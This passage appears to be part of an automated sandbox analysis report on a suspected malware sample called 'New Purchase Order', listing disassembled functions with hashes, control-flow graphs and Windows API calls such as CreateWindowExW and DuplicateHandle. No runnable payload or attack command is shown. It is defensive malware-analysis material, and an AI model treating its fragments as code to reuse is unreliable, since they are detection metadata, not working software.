                                                          • Opcode ID: de86ceebab00ef71ebf4bc9a6246017e77458c6c48918c6408472d807c6765f8
                                                          • Instruction ID: 04770675a0d755407956bac4b4d26a2b0830ab20f9607f7166aa776f8b472e8a
                                                          • Opcode Fuzzy Hash: de86ceebab00ef71ebf4bc9a6246017e77458c6c48918c6408472d807c6765f8
                                                          • Instruction Fuzzy Hash: 12712830A08295CFDB05CF64D89466EBFB2BF96304F1688AFD551EB262C635CD05CB62
                                                          Function 00D20ACC Relevance: .2, Instructions: 204COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 19342747cba981d52d82701651b9962c1337aca7cdeb2c0d74ff2b581def212a
                                                          • Instruction ID: 314d28619c888abb12ed3ccbe352a701f4f5d1c64bf0cca0c2d09a2896de49c1
                                                          • Opcode Fuzzy Hash: 19342747cba981d52d82701651b9962c1337aca7cdeb2c0d74ff2b581def212a
                                                          • Instruction Fuzzy Hash: DF713C30B08295CFDB05CF68D894ABEBFB2EF96304F16449ED551EB262C6348D45CB62
                                                          Function 00D208C1 Relevance: .2, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6206d9032357b7958ae58fba28254fa5dfc8006d6f7824fd19c250bcfd85a5e0
                                                          • Instruction ID: 1c4e0ed65e615b6e02b1d1cc5e5fb900156102e8abb31a1a832cbe40dedb646c
                                                          • Opcode Fuzzy Hash: 6206d9032357b7958ae58fba28254fa5dfc8006d6f7824fd19c250bcfd85a5e0
                                                          • Instruction Fuzzy Hash: AF714C30B08295CFDB05CF74D8946AEBFB2AF96304F1584AFD551EB262C6348D05CB62
                                                          Function 00D20901 Relevance: .2, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 27bc4cd92841a7a60b015b77f5fb3b61f9bcabdf283b4520fc530603f67507e3
                                                          • Instruction ID: 2c9384e44bac3c95c5ca20df4d5f92368279cda2031a29d1de3fd6a969576c2f
                                                          • Opcode Fuzzy Hash: 27bc4cd92841a7a60b015b77f5fb3b61f9bcabdf283b4520fc530603f67507e3
                                                          • Instruction Fuzzy Hash: 97711830B08295CFDB05CF64D8946AEBFB2AF96304F1584AED551EB262C6348D45CB62
                                                          Function 00D20BB9 Relevance: .2, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 80e45bc9532fc83be08254fa63c418843f04dfa2a566c21cde46a175b7a36038
                                                          • Instruction ID: 95b3b4a5474cf7e170f4bee1a9a065d6392fbb57d68869845ee1e1a826a7a6b3
                                                          • Opcode Fuzzy Hash: 80e45bc9532fc83be08254fa63c418843f04dfa2a566c21cde46a175b7a36038
                                                          • Instruction Fuzzy Hash: 1F711930B08295CFDB05CB68D8946AEFFB2EF96304F15849ED551EB262C6348D45CB62
                                                          Function 00D20B1D Relevance: .2, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 63ee75cc38fcb8f843d33b51d5cb45da78ebc736979c0f3629955a0be979e28c
                                                          • Instruction ID: cba00756092641e1e669a81cfc47c7212528877867ba65747987e8b3aebc025a
                                                          • Opcode Fuzzy Hash: 63ee75cc38fcb8f843d33b51d5cb45da78ebc736979c0f3629955a0be979e28c
                                                          • Instruction Fuzzy Hash: A4712770A08295CFDB05CF64D8946AEBFF2BF96304F16889ED551AB262C634CC05CB62
                                                          Function 00D20D5B Relevance: .2, Instructions: 202COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ca1d9d3dc6176a8eece91f946bd351f04d5664b8a6b951ffa3bea35406b857aa
                                                          • Instruction ID: d8308e905e602476627b203771dcc8f335ba249e93f9ee6d7a89132a44eb98c8
                                                          • Opcode Fuzzy Hash: ca1d9d3dc6176a8eece91f946bd351f04d5664b8a6b951ffa3bea35406b857aa
                                                          • Instruction Fuzzy Hash: 1A715830A08295CFDB05CF74D89466EBFB2AF96304F1588AFD551EB262C634CC05CB62
                                                          Function 00D20D19 Relevance: .2, Instructions: 196COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7c888ada68ab447b1eb375f9b17437056d0d5779c2d6181507d57abaf4e05781
                                                          • Instruction ID: 8fcaa4c01342f8b80fa54c71530b53193dd848d35ebd30da8648ec939cd32407
                                                          • Opcode Fuzzy Hash: 7c888ada68ab447b1eb375f9b17437056d0d5779c2d6181507d57abaf4e05781
                                                          • Instruction Fuzzy Hash: BA710A30B08295CFDB05CF68D8946AEBFB2BF96304F15849ED551EB262C6348D05CB66
                                                          Function 00D20B6C Relevance: .2, Instructions: 195COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5ad8c540120bfb594bc76cf536686bf011228a33b0fa54544fe86bc12be20d25
                                                          • Instruction ID: cc01bd7c054cdfd69da4aafedadd4ff2b9bc7010a941e9ccc2e0b38ee241326b
                                                          • Opcode Fuzzy Hash: 5ad8c540120bfb594bc76cf536686bf011228a33b0fa54544fe86bc12be20d25
                                                          • Instruction Fuzzy Hash: 71712A30B08295CFDF05CF68D8946AEBFB2AF96304F16489FD551EB262C6348D05CB62
                                                          Function 00D20A15 Relevance: .2, Instructions: 194COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0185575b15f2ba7c495a0a72b7e925bd397c6682a162617355cf88b37dd62eba
                                                          • Instruction ID: 0a691aa2c79f9c5beebe4a74be29ac647d4741997886764280e61c2bf128c0bd
                                                          • Opcode Fuzzy Hash: 0185575b15f2ba7c495a0a72b7e925bd397c6682a162617355cf88b37dd62eba
                                                          • Instruction Fuzzy Hash: 21710830B08295CFDB05DB74D8946AEBFB2AF96304F16849FD551EB262C6348D05CB62
                                                          Function 00D20A92 Relevance: .2, Instructions: 193COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3a29ebc9e90900c14e4375aab1f0dd911753909ce03004d75712cac578fee3bd
                                                          • Instruction ID: 9e1b045bc982a96aca42c3a61874439a7949c71c815975b8d4358563c2ce4972
                                                          • Opcode Fuzzy Hash: 3a29ebc9e90900c14e4375aab1f0dd911753909ce03004d75712cac578fee3bd
                                                          • Instruction Fuzzy Hash: E2711A30B08295CFDB05CF78D8946AEBFB2AF96304F15889FD551EB262C6348D05CB62
                                                          Function 00D2A548 Relevance: .2, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0ae3301d5dd0a6e8b6a65c6714386029f73192330329d1fd8c2b951e0e6b5dd7
                                                          • Instruction ID: 38d0cd4176f99329d1a97ce994970871f922015bc34cd3f7bac99932f496800e
                                                          • Opcode Fuzzy Hash: 0ae3301d5dd0a6e8b6a65c6714386029f73192330329d1fd8c2b951e0e6b5dd7
                                                          • Instruction Fuzzy Hash: 0151D030B043118BCB16AB78E96566EB7A7EFD4304F148429D406CB3A6DF34DD068BB2
                                                          Function 00D273C8 Relevance: .2, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ca22b65b79d9f446c50067d94ab1be47260009ac98b5b1a92a037195d2644b68
                                                          • Instruction ID: 8091e1c8fa0132bb7aa739eda0112d43826b44863b9587f7c4341b001f28d20e
                                                          • Opcode Fuzzy Hash: ca22b65b79d9f446c50067d94ab1be47260009ac98b5b1a92a037195d2644b68
                                                          • Instruction Fuzzy Hash: E6519070B043118BCB0AAB78E96566FB7A7EFD4304F108829E4068B795DF74DD064BB6
                                                          Function 00D20EB8 Relevance: .1, Instructions: 128COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 371a257e80cf27ff38fd16eaeee0b4b3999ac82c49d5a50944d8827a5d2ad118
                                                          • Instruction ID: b50db08b35ceb06c2aef2a4d4f767f124028bfd6a9b8e66fa139a4031581a917
                                                          • Opcode Fuzzy Hash: 371a257e80cf27ff38fd16eaeee0b4b3999ac82c49d5a50944d8827a5d2ad118
                                                          • Instruction Fuzzy Hash: 4941C330B00159CFDB04DFA9D84577EBBB6BF98314F11842AE616EB361CA75C901CBA1
                                                          Function 04DB0A60 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 04DB0AEE
                                                          • GetCurrentThread.KERNEL32 ref: 04DB0B2B
                                                          • GetCurrentProcess.KERNEL32 ref: 04DB0B68
                                                          • GetCurrentThreadId.KERNEL32 ref: 04DB0BC1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID:
                                                          • API String ID: 2063062207-0
                                                          • Opcode ID: 692e100947eb83bdcb48c79c23a6fba6616f238734db158d13c51981a6d20157
                                                          • Instruction ID: 1cac53e99a9eeeecf6d468d57d33286348ee176cb5468c1542ff69fa84669815
                                                          • Opcode Fuzzy Hash: 692e100947eb83bdcb48c79c23a6fba6616f238734db158d13c51981a6d20157
                                                          • Instruction Fuzzy Hash: 985167B0904348CFEB55CFA9D548BEEBBF1BF48304F208469D449A72A1D774A944CB65
                                                          Function 04DB0A70 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32 ref: 04DB0AEE
                                                          • GetCurrentThread.KERNEL32 ref: 04DB0B2B
                                                          • GetCurrentProcess.KERNEL32 ref: 04DB0B68
                                                          • GetCurrentThreadId.KERNEL32 ref: 04DB0BC1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Current$ProcessThread
                                                          • String ID:
                                                          • API String ID: 2063062207-0
                                                          • Opcode ID: 83aee647184842cdd16f2b5744c02b1d463fefa7a581f24ecb94aeb44e95b95e
                                                          • Instruction ID: e3aba7737ca14a46bb48d3130508b70be2f44d280fb57cc7fd0acf1c87e21a4a
                                                          • Opcode Fuzzy Hash: 83aee647184842cdd16f2b5744c02b1d463fefa7a581f24ecb94aeb44e95b95e
                                                          • Instruction Fuzzy Hash: 1B5168B0900348CFEB45CFAAD548BEEBBF5BF48304F208469D049A7351D774A944CB65
                                                          Function 04DB50D0 Relevance: 1.7, APIs: 1, Instructions: 192COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 46 4db50d0-4db50d2 47 4db50d6-4db50da 46->47 48 4db50d4 46->48 49 4db50de-4db50f2 47->49 50 4db50dc-4db50dd 47->50 48->47 51 4db50f6-4db50fa 49->51 52 4db50f4 49->52 50->49 53 4db50fe-4db5112 51->53 54 4db50fc 51->54 52->51 55 4db5116-4db511a 53->55 56 4db5114 53->56 54->53 57 4db511e-4db5152 55->57 58 4db511c 55->58 56->55 59 4db5156-4db51da 57->59 60 4db5154 57->60 58->57 62 4db51de-4db5210 call 4db31f0 59->62 63 4db51dc 59->63 60->59 66 4db5215-4db5216 62->66 63->62 64 4db523c-4db5296 63->64 67 4db5298-4db529e 64->67 68 4db52a1-4db52a8 64->68 67->68 69 4db52aa-4db52b0 68->69 70 4db52b3-4db5352 CreateWindowExW 68->70 69->70 72 4db535b-4db5393 70->72 73 4db5354-4db535a 70->73 77 4db53a0 72->77 78 4db5395-4db5398 72->78 73->72 79 4db53a1 77->79 78->77 79->79
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8d180e66a30c955407e5b84c07c09f7892522ae119e49b5b3775ed2025223454
                                                          • Instruction ID: d701f23a2501b21d2123d968c4f8a138bd8f88711a3655162dd05897d31cf158
                                                          • Opcode Fuzzy Hash: 8d180e66a30c955407e5b84c07c09f7892522ae119e49b5b3775ed2025223454
                                                          • Instruction Fuzzy Hash: A7715875D05388EFDF12CFA9D8909DDBFB1BF09314F18819AE885AB262C7749845CB90
                                                          Function 04DB515B Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 80 4db515b-4db5296 82 4db5298-4db529e 80->82 83 4db52a1-4db52a8 80->83 82->83 84 4db52aa-4db52b0 83->84 85 4db52b3-4db52eb 83->85 84->85 86 4db52f3-4db5352 CreateWindowExW 85->86 87 4db535b-4db5393 86->87 88 4db5354-4db535a 86->88 92 4db53a0 87->92 93 4db5395-4db5398 87->93 88->87 94 4db53a1 92->94 93->92 94->94
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04DB5342
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: f6dced9d4fbb80752e21c1b07ec5223b4bfa9f4834fb2f4571e24111dfcb5834
                                                          • Instruction ID: 3faa79504153d3fb42db23a1369d175a6ed0373d6567500bedda40b087178082
                                                          • Opcode Fuzzy Hash: f6dced9d4fbb80752e21c1b07ec5223b4bfa9f4834fb2f4571e24111dfcb5834
                                                          • Instruction Fuzzy Hash: AC512770D09388DFDF15CFA9D8906DDBFB1AF49704F1481AAE845AB252C774A845CF90
                                                          Function 04DB5224 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 95 4db5224-4db5226 96 4db522a 95->96 97 4db5228 95->97 98 4db522e-4db5296 96->98 99 4db522c 96->99 97->96 101 4db5298-4db529e 98->101 102 4db52a1-4db52a8 98->102 99->98 101->102 103 4db52aa-4db52b0 102->103 104 4db52b3-4db52eb 102->104 103->104 105 4db52f3-4db5352 CreateWindowExW 104->105 106 4db535b-4db5393 105->106 107 4db5354-4db535a 105->107 111 4db53a0 106->111 112 4db5395-4db5398 106->112 107->106 113 4db53a1 111->113 112->111 113->113
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04DB5342
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 1b96a6882bf8c5fbbe3703898b7987c3acbaff1f11537deac31ae839ad4ddb81
                                                          • Instruction ID: 01914951a9c1bb46422890bc792bbf431cd468401b6ecee09ee349e6c4f41634
                                                          • Opcode Fuzzy Hash: 1b96a6882bf8c5fbbe3703898b7987c3acbaff1f11537deac31ae839ad4ddb81
                                                          • Instruction Fuzzy Hash: 3E51DFB1D00309EFDF14CF99D890ADEBBB5BF48314F64812AE859AB210D775A846CF90
                                                          Function 04DB5230 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 114 4db5230-4db5296 116 4db5298-4db529e 114->116 117 4db52a1-4db52a8 114->117 116->117 118 4db52aa-4db52b0 117->118 119 4db52b3-4db52eb 117->119 118->119 120 4db52f3-4db5352 CreateWindowExW 119->120 121 4db535b-4db5393 120->121 122 4db5354-4db535a 120->122 126 4db53a0 121->126 127 4db5395-4db5398 121->127 122->121 128 4db53a1 126->128 127->126 128->128
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04DB5342
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 233bb92c209119c6f63c00d05cf5b3273b2d149ec740959e523c41fa92d5fcb3
                                                          • Instruction ID: d90327bf1b44623042557f36e6a23bacc4b94db9e368f3c635440f6b61d6df7d
                                                          • Opcode Fuzzy Hash: 233bb92c209119c6f63c00d05cf5b3273b2d149ec740959e523c41fa92d5fcb3
                                                          • Instruction Fuzzy Hash: 5F419DB1D00349EFDB14CF9AD894ADEBBB5BF48314F64812AE819AB210D775A845CF90
                                                          Function 04DB51BB Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 129 4db51bb-4db5296 131 4db5298-4db529e 129->131 132 4db52a1-4db52a8 129->132 131->132 133 4db52aa-4db52b0 132->133 134 4db52b3-4db52eb 132->134 133->134 135 4db52f3-4db5352 CreateWindowExW 134->135 136 4db535b-4db5393 135->136 137 4db5354-4db535a 135->137 141 4db53a0 136->141 142 4db5395-4db5398 136->142 137->136 143 4db53a1 141->143 142->141 143->143
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04DB5342
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CreateWindow
                                                          • String ID:
                                                          • API String ID: 716092398-0
                                                          • Opcode ID: 3623e36040988092ea89355e5ab0a2ec57427e09e9f92a5b5383e7aa1ce22f71
                                                          • Instruction ID: f44d37a69dd2236fe531326634e5f0e403083d941fb6aa75d0e7174d3e67c215
                                                          • Opcode Fuzzy Hash: 3623e36040988092ea89355e5ab0a2ec57427e09e9f92a5b5383e7aa1ce22f71
                                                          • Instruction Fuzzy Hash: 2041DEB1D00348EFDF15CFA9D890ADEBBB1AF48304F24816AE845AB211D775A885CF90
                                                          Function 00D28EBC Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 144 d28ebc-d28ebe 145 d28ec2 144->145 146 d28ec0-d28ec1 144->146 147 d28ec6-d28f89 CreateActCtxA 145->147 148 d28ec4-d28ec5 145->148 146->145 150 d28f92-d28fec 147->150 151 d28f8b-d28f91 147->151 148->147 158 d28ffb-d28fff 150->158 159 d28fee-d28ff1 150->159 151->150 160 d29010 158->160 161 d29001-d2900d 158->161 159->158 163 d29011 160->163 161->160 163->163
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 00D28F79
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: 375924b3b240dc9eb389eba9f09ef2fd21b1e6d24f9755ac7917426e739ddc38
                                                          • Instruction ID: e5b228fd4674f9ff3aef5a3918359c73fec64a356ad48ff8eb3564fdbb737781
                                                          • Opcode Fuzzy Hash: 375924b3b240dc9eb389eba9f09ef2fd21b1e6d24f9755ac7917426e739ddc38
                                                          • Instruction Fuzzy Hash: 4941D5B1C01728CFDB24CFA9D944BDEBBB5BF48304F24806AD458AB251DB766945CF50
                                                          Function 04DB3344 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 164 4db3344-4db783c 167 4db78ec-4db790c call 4db321c 164->167 168 4db7842-4db7847 164->168 175 4db790f-4db791c 167->175 170 4db789a-4db78d2 CallWindowProcW 168->170 171 4db7849-4db7880 168->171 172 4db78db-4db78ea 170->172 173 4db78d4-4db78da 170->173 177 4db7889-4db7898 171->177 178 4db7882-4db7888 171->178 172->175 173->172 177->175 178->177
                                                          APIs
                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 04DB78C1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CallProcWindow
                                                          • String ID:
                                                          • API String ID: 2714655100-0
                                                          • Opcode ID: 8078b984b923ce23b22616331c2301dc61305e19d869d4bc33957ae9ebbd221c
                                                          • Instruction ID: 6614e3b9652f1a5b6e6c39c48a0e0473d3ccf885b7ffc7e2656c1f06863a4442
                                                          • Opcode Fuzzy Hash: 8078b984b923ce23b22616331c2301dc61305e19d869d4bc33957ae9ebbd221c
                                                          • Instruction Fuzzy Hash: D0411CB8A00705CFDB15CF99C444BAABBF5FF88314F248459D59967321D774A845CBA0
                                                          Function 00D27A4C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 181 d27a4c-d28f89 CreateActCtxA 184 d28f92-d28fec 181->184 185 d28f8b-d28f91 181->185 192 d28ffb-d28fff 184->192 193 d28fee-d28ff1 184->193 185->184 194 d29010 192->194 195 d29001-d2900d 192->195 193->192 197 d29011 194->197 195->194 197->197
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 00D28F79
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: ccc974ef57e8e5296364c2cf4f24b6e4bab877ebc476387ccd46dc8aabdf9e21
                                                          • Instruction ID: f0a86227fef199062b354927f895ffe5ecf3e67592892bbb5cd057ab8932bef3
                                                          • Opcode Fuzzy Hash: ccc974ef57e8e5296364c2cf4f24b6e4bab877ebc476387ccd46dc8aabdf9e21
                                                          • Instruction Fuzzy Hash: 1841D270C04728CFDB24CFA9D944B9EBBB5BF49304F20806AD458AB251DBB56945CF90
                                                          Function 04DB0CB0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 198 4db0cb0-4db0cb2 199 4db0cb6-4db0d4c DuplicateHandle 198->199 200 4db0cb4-4db0cb5 198->200 201 4db0d4e-4db0d54 199->201 202 4db0d55-4db0d72 199->202 200->199 201->202
                                                          APIs
                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04DB0D3F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: DuplicateHandle
                                                          • String ID:
                                                          • API String ID: 3793708945-0
                                                          • Opcode ID: eba79a4291d393849b05f685cd38f8cd2f1b9deafdbc270134af5b4498e23a21
                                                          • Instruction ID: 71787a5f868c8fe924ae02b8f737d7c0e4d2be4568e94c567a98cfbcb6164312
                                                          • Opcode Fuzzy Hash: eba79a4291d393849b05f685cd38f8cd2f1b9deafdbc270134af5b4498e23a21
                                                          • Instruction Fuzzy Hash: 5A2105B5900608DFDB11CF99D484BDEBBF4FB48310F14802AE958A7350C374A945CFA0
                                                          Function 04DB0CB8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
